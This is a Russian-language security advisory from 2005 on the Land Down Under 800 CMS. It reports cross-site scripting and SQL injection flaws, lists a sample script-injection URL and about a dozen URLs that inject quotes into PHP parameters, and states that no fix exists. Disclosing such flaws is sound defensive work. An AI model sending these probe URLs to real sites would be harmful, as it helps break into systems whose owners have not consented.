Множественные уязвимости в Land Down Under 800
| Дата публикации: | 24.08.2005 |
| Дата изменения: | 20.10.2006 |
| Всего просмотров: | 1985 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Land Down Under 800
Описание: Удаленный пользователь может выполнить XSS нападение и выполнить произвольные SQL команды на операционной системе. 1. XSS: /ldu/index.php?c='><script>alert('test');</script> /ldu/forums.php?m=topics&s=' /ldu/list.php?c=articles&s=title&w=asc&o='&p=1 /ldu/list.php?c=articles&s=title&w='&o=1&p=1 /ldu/list.php?c=articles&s='&w=asc&o=1&p=1 /ldu/journal.php?m='&s=username&w=asc /ldu/journal.php?m='&p=1 /ldu/journal.php?m=' /ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x=' /ldu/forums.php?m=topics&q=3&n=' /ldu/list.php?c=articles&s=title&w=asc&o=1&p=' /ldu/forums.php?m='&q=3&n=last /ldu/links.php?c=links&s=title&w=' URL производителя:http://www.neocrome.net/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Bugs Land Down Under v800 |